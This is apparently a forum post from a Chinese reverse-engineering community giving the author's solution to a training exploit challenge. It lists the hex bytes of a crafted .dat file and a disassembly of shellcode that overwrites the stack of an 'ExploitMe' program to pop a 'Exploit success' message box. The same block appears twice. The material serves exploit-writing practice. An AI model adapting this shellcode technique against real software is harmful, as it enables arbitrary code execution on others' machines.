-
-
[原创][第一阶段 第一题]
-
发表于: 2010-10-18 23:33 2842
-
关键指令
dat文件里面的二进制
EB 03 90 90 90 6A 00 68 6C 60 40 00 68 9A FC 12 00 6A 00 FF 15 10 85 40 00 C3 90 90 45 00 78 00
70 00 6C 00 6F 00 69 00 74 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 00 00
用于来覆盖汇编代码!!!
0012FC7E /EB 03 jmp short 0012FC83
0012FC80 |90 nop
0012FC81 |90 nop
0012FC82 |90 nop
0012FC83 \6A 00 push 0
0012FC85 68 6C604000 push 40606C ; UNICODE "ExploitMe"
0012FC8A 68 9AFC1200 push 12FC9A ; UNICODE "Exploit success"
0012FC8F 6A 00 push 0
0012FC91 FF15 10854000 call dword ptr [408510] ; user32.MessageBoxW
0012FC97 C3 retn
0012FC98 90 nop
0012FC99 90 nop
0012FC9A 45 inc ebp
0012FC9B 0078 00 add byte ptr [eax], bh
0012FC9E 70 00 jo short 0012FCA0
0012FCA0 6C ins byte ptr es:[edi], dx
0012FCA1 006F 00 add byte ptr [edi], ch
0012FCA4 6900 74002000 imul eax, dword ptr [eax], 200074
0012FCAA 73 00 jnb short 0012FCAC
0012FCAC 75 00 jnz short 0012FCAE
0012FCAE 6300 arpl word ptr [eax], ax
0012FCB0 6300 arpl word ptr [eax], ax
0012FCB2 65:0073 00 add byte ptr gs:[ebx], dh
0012FCB6 73 00 jnb short 0012FCB8
0012FCB8 0000 add byte ptr [eax], al
dat文件里面的二进制
EB 03 90 90 90 6A 00 68 6C 60 40 00 68 9A FC 12 00 6A 00 FF 15 10 85 40 00 C3 90 90 45 00 78 00
70 00 6C 00 6F 00 69 00 74 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 00 00
用于来覆盖汇编代码!!!
0012FC7E /EB 03 jmp short 0012FC83
0012FC80 |90 nop
0012FC81 |90 nop
0012FC82 |90 nop
0012FC83 \6A 00 push 0
0012FC85 68 6C604000 push 40606C ; UNICODE "ExploitMe"
0012FC8A 68 9AFC1200 push 12FC9A ; UNICODE "Exploit success"
0012FC8F 6A 00 push 0
0012FC91 FF15 10854000 call dword ptr [408510] ; user32.MessageBoxW
0012FC97 C3 retn
0012FC98 90 nop
0012FC99 90 nop
0012FC9A 45 inc ebp
0012FC9B 0078 00 add byte ptr [eax], bh
0012FC9E 70 00 jo short 0012FCA0
0012FCA0 6C ins byte ptr es:[edi], dx
0012FCA1 006F 00 add byte ptr [edi], ch
0012FCA4 6900 74002000 imul eax, dword ptr [eax], 200074
0012FCAA 73 00 jnb short 0012FCAC
0012FCAC 75 00 jnz short 0012FCAE
0012FCAE 6300 arpl word ptr [eax], ax
0012FCB0 6300 arpl word ptr [eax], ax
0012FCB2 65:0073 00 add byte ptr gs:[ebx], dh
0012FCB6 73 00 jnb short 0012FCB8
0012FCB8 0000 add byte ptr [eax], al
赞赏
他的文章
- [原创]DIY PPS 退出之前终结PPSAP进程,还我内存,还我网络 12916
- [原创][第一阶段 第一题] 2843
- [原创]监视VB调用CreateObject 12298
- [注意]看看这个CrackME 5308
看原图
赞赏
雪币:
留言: